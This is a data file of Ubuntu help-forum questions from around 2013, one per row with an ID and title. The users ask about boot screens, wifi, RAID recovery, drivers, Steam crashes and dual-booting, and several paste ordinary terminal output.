352598	purple screen on cold boot	i recently formatted my computer and installed fresh ubuntu 13.04 . it shows a blank purple screen when it is cold booted . i have to restart each time to start my computer in warm boot , then the grub comes , and i can start my computer . it is a single boot system and only ubuntu is installed . i have updated with all security updates offered to me automatically . please suggest me how to fix this issue . configuration : memory : 4 gb processor : pentium ( r ) dual-core cpu e5700 @ 3.00ghz ă 2 graphics : intelâž g41 os type : 64-bit disk : 500 gb
352600	software downloader downloading dozens of mb ( almost ) every day	why does ubuntu 's software updater download around 80 mb ( almost ) every day ? does it simply replace the original content constantly ? it is not always downloading for the same application , but it still strikes me as too much .
352603	booting ubuntu - gnome gets stuck	i installed ubuntu 13.04 gnome edition . installed amd proprietary drivers and uninstalled them to try the beta drivers instead . upon restart , i get stuck on a black screen with a - cursor on it , which does not blink . i am also not able to use key combinations like ctrl + alt + f1 . nothing work except pressing the shutdown button , which then shuts down the computer and showing the gnome splash screen for a second . should i just reinstall ?
352604	install ubuntu on non booting windows 8 laptop	install on windows 8 system which is not booting as i do n't have the recovery cd and have to buy it from hp . so i want to remove the existing windows 8 completely and install ubuntu . help me please . i have tried all recovery options . my laptop is hp g6 i7 3rd gen .
352607	raid 0 recovery	i have been using raid0 with four disk over two years . but suddenly it started giving and error at logging errors were found while checking the disk drive for / in order to solve this i booted the machine with a live cd and tried to fix the file system with fsck -f /dev/md0 but since then i dont find the /dev/md0 . the result of fdisk -l root @ partedmagic : ~ # fdisk -l disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00013cca device boot start end blocks id system /dev/sda1 2048 233969663 116983808 fd linux raid autodetect /dev/sda2 233971710 250068991 8048641 5 extended /dev/sda5 233971712 250068991 8048640 82 linux swap / solaris disk /dev/sdb : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00008184 device boot start end blocks id system /dev/sdb1 2048 233969663 116983808 fd linux raid autodetect /dev/sdb2 233971710 250068991 8048641 5 extended /dev/sdb5 233971712 250068991 8048640 82 linux swap / solaris disk /dev/sdc : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000343d1 device boot start end blocks id system /dev/sdc1 2048 233969663 116983808 fd linux raid autodetect /dev/sdc2 233971710 250068991 8048641 5 extended /dev/sdc5 233971712 250068991 8048640 82 linux swap / solaris disk /dev/sdd : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002d929 device boot start end blocks id system /dev/sdd1 * 2048 233969663 116983808 fd linux raid autodetect /dev/sdd2 233971710 250068991 8048641 5 extended /dev/sdd5 233971712 250068991 8048640 82 linux swap / solaris* but now the system does not boot . i think the reason is as the /dev/md0 is not available . root @ partedmagic : ~ # mdadm -- detail /dev/md0 mdadm : can not open /dev/md0 : no such file or directory i need the data available in the drives . can some one help me with fixing this so i can at least retrieve my data .
352608	how to make a complete backup of ubuntu 12.04 server without anything missing , to switch it to a different hard drive	how to make a complete backup of ubuntu 12.04 server without anything missing , to switch it to a different hard drive altogether and the computers look 覺dent覺cal ?
352609	qt installation on ubuntu 12.10	i 'm new on ubuntu and i ca n't understand the meaning of installation guide of software on ubuntu . i want to install qt on the basis of an instruction that said i should install qt version > 4.6 ; ( core , gui , and xml components ) what does it mean ? how can i start installing qt ? thanks
352612	network monitor applet in xubuntu 13.04	heyy there , i have the applet to show current traffic , it shows results in kib format , can i change it into mbps ? thank you .
352613	utorrent is unable to download anything , not even peer discovery . what could be wrong ? [ xubuntu 13.04 ]	i am able to run the server in my browser , but when i add any torrent it does nothing . it is unable to find any peers . i have tried the same torrent on windows version of utorrent and it downloads fine . this started happening earlier today . i was downloading something and was getting a good speed when suddenly the download just stopped . after this , it is not downloading anything . i have tried many torrents . how do i diagnose this ? i 'm fairly new to linux .
352616	why 's my wifi-hotspot connection failing to get established ?	what i did : open system settings , network , wireless . clicked `` create hotspot '' ( nothing happened ) . clicked network icon in panel create new wireless network entered name and password entered ssid `` ubuntu '' set ipv6 setting to ignored ( default ) tried create-hotspot again and failed ! error message : `` wifi disconnected '' i 'll update any necessary info here as you request .
352618	sound board beeping compulsively after installing ubuntu 12.04	i have just installed ubuntu 12.04 on a packard bell easynote mv85-100 that was previously running winxp . pretty swift and no errors during install , but as soon as ubuntu loads the sound board goes bonkers and starts issuing a compulsive beeping sound ( kind of like morse code ) ; this is on full volume , after 5 minutes my head was cracking . i have tried to mute the sound , connect headphones and microphone , but nothing shuts the beeping off . in the sound settings menu there are two devices listed : the board and the headphones , with the later blinking to the rhythm of the beep . any hints on how to tame this soundboard are welcome . even just muting the sound would be an improvement . thanks .
352620	wifi not connecting on ubuntu	sir , earlier i am getting wifi connection , now not connecting on ubuntu but the same connect on windows 7. please help me to solve this problem . thank you subin
352623	all program windows are grey after updating 13.04	i 'm running the latest version of ubuntu 13.04 and have just installed all updates - now when i log in i get grey windows when i open an application . if i maximize the window i can see the contents of it . another problem that seems to be related is when i right-click the menu is just a grey box with no content . unity does not work at all - i just get a blank screen , however gnome 3 works to a certain degree ( as above ) . i have tried adjusting the display settings but since this window can not be maximised it just displays as a grey box and i can not see the windows content . i 'm running ubuntu 13.04 ( x64 ) , 8gm ram , ati 7500hd assuming it 's a video driver issue but not sure what to do / how to fix without gui
352627	no option to choose open-source driver on amd gpu ( ubuntu 12.04 lts )	i have an amd radeon hd 7480d and i ca n't seem to find an option for the xorg driver . after the update the open source video driver is nowhere to be found . how do i reinstall/restore it ? the proprietary drivers makes plymouth show a low resolution ubuntu loading screen .
352629	install ubuntu to unallocated sapace of window 7	i want to install ubuntu 12 . i have partitioned c , d , e , f , h ( system ) in window 7 , i have shrinked the f to two parts , the first remains 77gb and the 23gb is unalocated . no in ubuntu installtion box i ca n't see the unallocated space . i also tried to formate the unalocated space with ntfs and fat but still except c : all other are displaying only one partion , and the new partition is no where in the box . dev/sd dev/sd1 1mb unknown dev/sd2 104mb unknown dev/sd3 578099 38000 dev/sd4 262066 99943 why the formated and unallocated space except these are not displaying . what should i do to install ubuntu
352630	from windows xp to lubuntu 12.04 lts : was windows graphically best detailed ?	i switched from windows xp to lubuntu 12.04 lts . pretty cool : already loving xfce . anyway : i got to say that it looks like linux is graphically less detailed . i mean , i can clearly see a lot of pixels . chrome icon , for instance , it 's like a pixel armada . so , question is : am i missing something ? is there anything i can do about ? i 'm sorry , cause i know this is just a dumb , lame question . anyway , linux rocks . finally managed to come back surfing the web : instantly ! thank you in advance .
352631	how do i change volume sizes on ubuntu server 12.04.3 without reinstalling ?	i have a hp dl380 g7 server with the hw raid configured at raid 1+0 . previously , i have 146gb lff sas installed but i since have upgraded to 600gb lff sas drives . since the mirror rebuilding was based on the 146gb image , i have around 450gb of unused space which i want to integrate to the / filesystem . i am using this box as a web server . it is running a php web application with its db as mysql . i want to maximize the space for mysql to use since this web application is doing thousands of transactions per day . how do i change the volume size of the / filesystem without reinstalling ? are there any other suggestions to better maximize my system 's resources ? if needed , here are my specs . operating system ubuntu linux 12.04.3 kernel and cpu linux 3.8.0-31-generic on x86_64 processor information intel ( r ) xeon ( r ) cpu e5630 @ 2.53ghz , 16 cores real memory 418.78 mb used , 23.54 gb total box hp proliant dl380 g7
352632	how can i share my clipboard between two x servers ?	i 've recently set up my ubuntu machine so that i run another x session in pty8 . i mostly run virtual machines or remote desktop sessions on this other x server , which helps mediate some of the frustrations that can happen with keyboard integration in these environments . however , now if i copy something from some window on :0 , i ca n't paste it into some window on :1 . is there a way i can share the clipboard between these two sessions ?
352635	0 upgraded , 0 newly installed , 0 to remove and 428 not upgraded	when i want to install libqtcore4 or libqtgui4 or even libqt4-xml i got this text maryam @ maryam-mm061 : ~ $ sudo apt-get install libqtcore4 [ sudo ] password for maryam : reading package lists ... done building dependency tree reading state information ... done libqtcore4 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 428 not upgraded . i work with ubuntu 12.10 thanks
352638	is there deb packages that display license agreement ?	could you please list some deb packages that show license agreement and ask to accept it ? i would like to learn their internals .
352646	interacting with appindicator icon and menus from ldtp	i 'm using ldtp python api in order to test desktop applications under ubuntu ( unity shell , ubuntu 12.04 ) . i ca n't find if there 's any available way to interact with appindicator icon and menus using the api , and if it 's possible at all . can anyone suggest a solution ?
352647	battery backup not as long as expected and system temperature rises when using ubuntu	i 'm using both windows 7 and ubuntu-13.04 in my acer aspire 5738g notebook . i get 3 hrs battery backup in windows 7 . but in ubuntu it shows only 1.30 hours but as it goes on to ( it shows 1.30 but within 10 min it shows 1hr ) 0.59 hours suddenly it goes off . even though battery is fully charged and if i unplug the chord that time , the system will also go off . it takes hardly 1 hour to get charge ( in win7 ) , but in ubuntu it takes around 3 hours and the level will be fluctuating . also , the system heats up for short time use . so please tell me how to come out from this 2 bugs . you can email your suggestions to : raghugkatti @ gmail.com
352648	instaling ubuntu 13.04 alongside windows 8 os	i have an acer aspire v7 ultrabook and i want to install ubuntu 12.04 or 13.04 in it alongside windows 8.i also have a kingston usb pen drive in which 4gb space is free.please tell me how can i do it .
352652	c170 ubuntu 13.04 ?	i 've just purchased a c170 from logitech , and on my 2 pcs running ubuntu 12 and 13 , the system will not recognise that the cam is plugged in . when i plug in , the green light switches on for 10 seconds then switches off , and will not work at all ( cam apps hang if i try to use them ) except in skype , where i have no problem whatsoever ! ! ! getting the following in the terminal with lsusb : downes @ downes-latitude-d620 : ~ $ lsusb bus 001 device 011 : id 046d:082b logitech , inc . bus 002 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 005 device 003 : id 413c:3012 dell computer corp. optical wheel mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 002 device 004 : id 0b97:7762 o2 micro , inc. oz776 smartcard reader downes @ downes-latitude-d620 : ~ $ help please ... . any ideas willingly received ! ! ! thanks in advance
352653	wicd failed : unable to get ip address	i have an old laptop ( thinkpad t30 ) and i have installed lubuntu 10.04 on it . networkmanager could see the available wifi but the bottom was gray out . it seems that it is an unsolved-bug in wifi and the only solution was replacing it with lovely wicd . so , i have installed the latest wicd , and i got happy that i could have see the available wifi and possible access . but whenever i ask wicd to connect me to that , after quite few seconds , an error appear that : `` connection failed : unable to get ip address '' . i googled the error ; some people have suggested downgrading wifi , and some others were suggesting installing some drivers . and non of them worked . i also tried this `` http : //www.backtrack-linux.org/forums/showthread.php ? t=48658 '' . i appreciate any comments that can help me to make my wifi into work . either for troubleshooting the current `` wicd '' and this error , or installing other alternatives that i am not aware of . i assume the problem is somewhere between dhcp* and wicd but i am not sure how to track and solve it . ** update the out put of > > lspci -nn | grep 0280 02:02.0 network controller [ 0280 ] : aironet wireless communications cisco aironet wireless 802.11b [ 14b9 : a504 ] ** update ii lsmod lsmod : module size used by dm_crypt 11331 0 aes_i586 7268 1 aes_generic 26863 1 aes_i586 joydev 8708 0 thinkpad_acpi 68083 0 snd_seq_dummy 1338 0 snd_intel8x0 25588 1 snd_seq_oss 26726 0 snd_ac97_codec 100646 1 snd_intel8x0 ac97_bus 1002 1 snd_ac97_codec snd_pcm_oss 35308 0 snd_mixer_oss 13746 1 snd_pcm_oss snd_seq_midi 4557 0 snd_pcm 70662 3 snd_intel8x0 , snd_ac97_codec , snd_pcm_oss snd_rawmidi 19056 1 snd_seq_midi snd_seq_midi_event 6003 2 snd_seq_oss , snd_seq_midi snd_seq 47263 6 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_seq_midi_event snd_timer 19098 2 snd_pcm , snd_seq snd_seq_device 5700 5 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_rawmidi , snd_seq snd 54148 13 thinkpad_acpi , snd_intel8x0 , snd_seq_oss , snd_ac97_codec , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device yenta_socket 20408 0 led_class 2864 1 thinkpad_acpi psmouse 63245 0 nsc_ircc 18220 0 soundcore 6620 1 snd ppdev 5259 0 rsrc_nonstatic 10015 1 yenta_socket pcmcia_core 32964 2 yenta_socket , rsrc_nonstatic airo 67901 0 nvram 6171 1 thinkpad_acpi serio_raw 3978 0 snd_page_alloc 7076 2 snd_intel8x0 , snd_pcm irda 186556 1 nsc_ircc crc_ccitt 1339 1 irda parport_pc 25962 1 shpchp 28820 0 lp 7028 0 parport 32635 3 ppdev , parport_pc , lp dm_raid45 81647 0 xor 15028 1 dm_raid45 fbcon 35102 71 tileblit 2031 1 fbcon font 7557 1 fbcon bitblit 4707 1 fbcon softcursor 1189 1 bitblit vga16fb 11385 0 vgastate 8961 1 vga16fb radeon 674135 2 ttm 49943 1 radeon drm_kms_helper 29297 1 radeon e100 28211 0 intel_agp 24177 1 drm 162471 4 radeon , ttm , drm_kms_helper mii 4381 1 e100 video 17375 0 i2c_algo_bit 5028 1 radeon agpgart 31724 3 ttm , intel_agp , drm floppy 53016 1 output 1871 1 video . > > dmesg | grep -e eth1 -e airo [ 22.012681 ] airo ( ) : probing for pci adapters [ 22.012761 ] airo 0000.02.02.0 : pci int a - > link [ lnkc ] - > gsi 11 ( level , low ) - > irq 11 [ 22.012795 ] airo ( ) : found an mpi350 card [ 23.124370 ] airo ( eth1 ) : fireware version 5.41.00 [ 23.124377 ] airo ( eth1 ) : wpa supported [ 23.124382 ] airo ( eth1 ) : mac enabled 00.02:8a:5d : dc:57 [ 23.132848 ] airo ( ) : finished probing for pci adapters [ 34.744120 ] eth1 : no ipv6 routers present
352654	fail to get ubuntu 13.04 installed	i have a celeron 2.4 socket 478 32bit , 512mb ram , on-board graphics , 40 and 80 gb hhd desktop computer . i want to install ubuntu 13.04 32bit os on it , will be the only os on the computer . when i boot the computer with the disc , boots to where i can choose what to do , i chosen install ubuntu , then it start to load and disc is running and saying ubuntu in the middle of the screen for couple of seconds then the screen flicker between light purple , dark purple and black , there is a curser on the screen i can move around but that’s all what’s happening , can’t get the installation to run , does the same thing when i try to run live option from the disc , tried older screen as well . what can i do to get this installed , on my other pc i run the 64bit one with win 7 dual boot and it works fine , just there sometimes there is line flickering in the os over the screen . thank you
352655	'permission denied ' appears when attempted to install ise xilinx	when i tried to install ise xilinx on ubuntu 13.04 , the following error occurs : '' permission denied '' can anyone help me ? thanks in advance ! this is the error i 'm getting : luaiks @ luaiks-vpcea22ea : ~ $ cd /home/luaiks/downloads/xilinx_ise_ds_lin_14.6_p.68d_3 luaiks @ luaiks-vpcea22ea : ~/downloads/xilinx_ise_ds_lin_14.6_p.68d_3 $ sudo chmod +x xsetup [ sudo ] password for luaiks : luaiks @ luaiks-vpcea22ea : ~/downloads/xilinx_ise_ds_lin_14.6_p.68d_3 $ sudo ./xsetup ./xsetup : 18 : ./xsetup : ./bin/lin64/xsetup : permission denied luaiks @ luaiks-vpcea22ea : ~/downloads/xilinx_ise_ds_lin_14.6_p.68d_3 $
352658	remote login from the greeter not working	i 'm trying to set up the remote login feature of ubuntu , but i ca n't get it to work . i 've created an ubuntu one account , connected to uccs.landscape.canonical.com , logged in using the aforementioned ubuntu one account , and added 4 remote desktop logins . however , when i try and login by clicking remote login from the greeter , and then enter my ubuntu one email address and password , i 'm told there is an error with either one of those details . can anyone please shed any light as to why this may be happening ?
352660	application name different cli vs. graphic folder name // handbrake	i have a quick question -- i just installed handbrake . however when i open it in terminal i need to type $ ghb . when i go to graphic file browser /usr/share/applications/ there is application called handbrake which is what i want and if i doulbe click on the icon it opens handbrake just like when i type $ ghb . when i go to handbrake properties under command : it shows `` ghb '' . my question is what can i do in the terminal to change `` ghb '' to `` handbrake '' so that next time when i open the terminal and type $ handbrake the program will open ?
352661	dpkg and missing dependency problem	i downloaded an open source software from the internet to emulate white board on my computer . the link is here : http : //open-sankore.org/ the download was as .zip file with .deb file inside ( which i presume is the installation file ) i navigated to the directory where the .deb file is and i used the command : dpkg -i { filename.deb } however , the log says that there are some unmet dependencies . the icon of opensankure does show up dash but when i open software center , it says that the software catalog is broken and needs to be repaired . after repair , opensankure disappears from dash . can someone tell me how i can ensure that all dependencies are met at the time of install ? selecting previously unselected package open-sankore : i386 . ( reading database ... 178700 files and directories currently installed . ) unpacking open-sankore : i386 ( from open-sankore_2.1.0_i386.deb ) ... dpkg : dependency problems prevent configuration of open-sankore : i386 : open-sankore : i386 depends on libpaper1 ( > = 1.1.24+nmu1build1 ) . dpkg : error processing open-sankore : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : open-sankore : i386
352662	install odbc driver under ubuntu	i have the latest version of mysql and netbeans installed on my system . i also have the iodbc driver manager installed . i need help with installing an odbc driver and creating a dsn for my jsp project . i know how to create and configure a dsn under windows . but i ca n't figure out how to do this under ubuntu . neither am i able to install an odbc driver . how to do these ?
352663	remove start menu	i am customizing the lubuntu 13.04 live usb installation . how can i remove the start menu on the desktop ( the main menu on the left-bottom corner of the desktop ) . i want to add another menu of my choice instead . please help . thanks .
352669	ubuntu errouneously telling me that a username is already taken	i 've just installed ubuntu on my pc , and so far the only user is the one set up through the install process ( called master ) . i 'm trying to add a standard user account , but it 's not letting me . every time i enter my desired username , a no-entry symbol appears next to it and i 'm told that - a user with the username 'dgard ' already exists however , this can not be the case , because as previously mentioned there is only one user called master on this pc . i 've tried sudo userdel -r dgard , although i did n't expect this to do anything due to not having set a user up . indeed , i was presented with the below message , and an inspection of the file confirmed no entry for 'dgard ' - userdel : can not remove entry 'dgard ' from /etc/passwd can anyone please suggest why i may be encountering this problem ? information from comments : getent passwd dgard retunrs david gard : /home/likewise-open/dd/dgard : /bin/bash . i am using likewise to connect to a windows domain , but it seems odd that this would prevent me from having a local user with the same username as a domain user ?
352673	increase disk size of vmware machine	i 'm using 13.04 as my host os and installed vmplayer and created a guest windows 7 machine . being the idiot that i am , i only allocated 60gb and discovered i need more space for my windows 7 . when i go to virtual machine settings to increase the disk space , the utilities button is greyed out . i 've surfed some forums but i could n't find anyone with the same scenario .
352674	using git as off-line alternative for dropbox	i am working with lots of text files daily and i use dropbox as a way to restore earlier versions of files in case something goes wrong . i am looking for simple way to suplement/replace dropbox in that function in case my internet connection goes off and dropbox is not working . basically , i would like use git to : 1 ) automatically save every revision of every file on disk or in given folder , but limited to certain extensions ( .html , .tex , .txt , .doc , .odt etc . ) 2 ) easily browse previous versions and restore them . ideally , i would be able to choose destination folder for keeping revisions creating a new git project for each file is not very good idea , so i am looking for something simpler that will just re-create folders structure with an option to restore previous versions .
352677	alsamixer is out to get me ?	i 've been unable to piece together a proper solution to get alsamixer to properly manage my sound . here 's my desired behavior : on rebooting , hibernating or sleeping and then waking up , i want all alsamixer levels and mute settings preserved . the mute key on my keyboard should toggle mute , the volume-up and volume-down buttons should increase or decrease the volume , and if applicable , remove muting . when i plug in headphones , there should be a different volume setting for them and the volume levels should automatically adjust themselves . does n't matter to me if master changes or if the headphone / speaker levels change . just need to make sure that this works with the volume- { up , down } keys . i use xmonad and xbindkeys to map my volume/mute keys to actions . currently : '' amixer set master 2db+ '' xf86audioraisevolume '' amixer set master 2db- '' xf86audiolowervolume '' /path/to/mute.sh '' xf86audiomute where mute.sh is file= $ home/.mute if [ -f $ file ] ; then amixer set master `cat $ file` rm $ file else amixer get master\ | grep mono\ | grep -p -o ' [ \d ] { 1,3 } '\ | head -n 1\ > $ file amixer set master 0 fi currently , when i restart my computer , it seems like random channels are muted . and my mute script actually just sets the volume level to zero , which is n't ideal . on the bright side , plugging in headphones does seem to adjust the volume level . any ideas how i could make the muting and restart behavior better ? -- -- - edit 1 -- -- - master toggle mutes speaker channel also : $ amixer get speaker | tail -n 1 front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] $ amixer set master toggle simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 87 mono : playback 87 [ 100 % ] [ 0.00db ] [ off ] $ amixer set master unmute simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 87 mono : playback 87 [ 100 % ] [ 0.00db ] [ on ] $ amixer get speaker | tail -n 1 front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] -- -- - edit 2 -- -- - toggling is weird : $ for x in master headphone speaker ; do amixer set $ x toggle ; done simple mixer control 'master',0 mono : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'headphone',0 front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 front left : playback 87 [ 100 % ] [ 0.00db ] [ off ] front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] $ for x in master headphone speaker ; do amixer set $ x toggle ; done simple mixer control 'master',0 mono : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'headphone',0 front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ]
352682	os upgrade `on-the-fly`	i wonder if there is a way how to install newer version of os , let 's say 14.04 ( when it comes ) on the second partition of my server disk from within running os ( e.g . ubuntu 12.04 ) , then change grub boot order and reboot to new system ( reducing the server downtime ) ? scenario : 1st partition - ubuntu 12.04 - happy and running 2nd partition - empty new lts comes 1st partition - ubuntu 12.04 ( server still running ) - install 14.04 on second partition 2nd partition - installation in progress reboot after installation 1st partition - old system ( about to be wiped out ) 2nd partition - server running on 14.04 now ( down time reduced to one reboot ) any ideas how this could be achieved ? is puppet capable of automation of this kind ? thanks !
352687	steam opens update box and closes	when i try to open steam with terminal it says this ubuntu @ ubuntu-linux : ~ $ steam running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 8967 with name 0eblobregistrymutex_01adcaae08b43e5e8ae44675f4157195 removing stale semaphore last operated on by process 8967 with name 0eblobregistrysignal_01adcaae08b43e5e8ae44675f4157195 removing stale semaphore last operated on by process 9024 with name 0emsteamengineinstance removing stale semaphore last operated on by process 9024 with name 0esteamenginelock gtk-message : failed to load module `` gail '' gtk-message : failed to load module `` atk-bridge '' installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) [ 1002/173410 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379786203_client ) steam : an x error occurred x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 18 ( x_changeproperty ) value in failed request : 0x0 serial number of failed request : 105 xerror_handler : x failed , continuing uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20131002173407_1.dmp /home/ubuntu/.local/share/steam/steam.sh : line 704 : 9373 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-861c8f22-4970-4dab-90b5-c79ad2131002 what do i do ? i reinstalled it twice it downloaded some 200 mb update and still did n't start ... every time i open it it opens update window and closes . my laptop specifications : i5 3230 m 4gb ram intel hd 4000 graphics
352688	moodle - ubuntu configuration for links on 12.04 - 32 bit	i have installed moodle on a server with an ip address of a.b.c.d , using the command sudo apt-get install moodle this site is sucessfully running on the following address http : //localhost/moodle however , when i try to access moodle from another computer on the network , it so happens that all the links are absolute and not relative , i.e . all links are shown as localhost/moodle/login.php for example . any clues on the configuration on ubuntu ?
352689	recover files from guiless ubuntu	i 've installed my computer ubuntu 12.04 and i 've customized a bit . i 've disable gui via editing /etc/default/grub change grub_cmdline_linux_default=”quiet splash” to grub_cmdline_linux_default=”text” and then sudo update-grub i 've disabled password login via editingh /etc/init/tty1.conf exec /bin/login -f username < /dev/tty1 > /dev/tty1 2 > & 1 finally i add my program to start up via ; sudo mv /filename /etc/init.d/ sudo chmod +x /etc/init.d/filename sudo update-rc.d filename defaults but when computer boots up , ca n't see anything on the monitor . when i tried to push power button , my programs default greeting message appear on the screen with no keyboard function . my program runs throuhg infinite loop so ca n't stop by itself . i want to stop this program and recover files from this machine but , no keyboard function limits my operations . ps : i ca n't remember whether i installed the ssh or not . disabling startup program will work fine for me .
352690	ubuntu admin session not loading after uninstall gnome shell	i 'm having a big big issue on my ubuntu 12.04 . i wanted to uninstall gnome shell from my computer . so according to a forum ( i do n't remember which one ) , i uninstalled it from the package manager and then the non uninstalled packages from command line . when i rebooted my machine , i can see the login screen . however , when typing my password , the session start loading and then go back to my login screen without any error message . is there a way to boot on a rescue mode or super admin mode and reinstall at least ubuntu desktop or something who could fix it ? thanks a lot
352698	wich version of ubuntu should i use with my processor	i bought a laptop a while ago and i 'm sort of trough with windows . i wanted to try ubuntu but i do n't know wich version i should take . i got a samsung np300e5a-s02nl it has a intel i3 2330m @ 2.2ghz processor 8gb of ram nvidia geforce 520mx a chipset intel hd graphics videocard i know for windows there is a need of x64 to get full use out of your 8gb of ram , is this the same for ubuntu ? thanks in advance sjeafer
352702	unable to connect to visible wireless network	i 'm using ubuntu 13.04 and i 'm unable to use my wifi router . i see my wireless networkname in the network menu and when i select it and type my password , it tries for several seconds to connect and then fails . i 'm sure the password is correct , because i use it with no problem with my windows 8 os on the same machine . when i connect my notebook to the router via cable it works fine ( actually i 'm using it now that way ) . so why i can not connect to the wifi network ? ubuntu 13.04 64bit lenovo g580 edit $ sudo lshw -c network *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : b8:88 : e3:94 : bf:12 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.0.101 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : d3900000-d393ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : c0:14:3d : d3 : ca:7f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : d3800000-d3803fff edit 2 $ dmesg [ 4171.962758 ] cfg80211 : calling crda to update world regulatory domain [ 4171.965750 ] cfg80211 : world regulatory domain updated : [ 4171.965752 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 4171.965754 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 4171.965755 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 4171.965756 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 4171.965757 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 4171.965758 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm )
352703	i am not able to dual boot in dell inspiron 15z	i have kept boot settings in legacy mode . after setting it when i go to boot setup and select usb drive in which i have ubuntu 13.04. it asks : 1 . try ubuntu 2 . install ubuntu 3 . ... . 4 . ... . when i click on install ubuntu , the process does n't go ahead . it shows some errors like : failed to read file . load kernel version first. , but while in laptops like 15r and 17r some procedure followed it gets installed . please answer me why i am not able to dual boot . please send me step-by-step procedures of dual booting in the dell inspiron 15z . please reply , i 'm in urgent need of ubuntu dual booting .
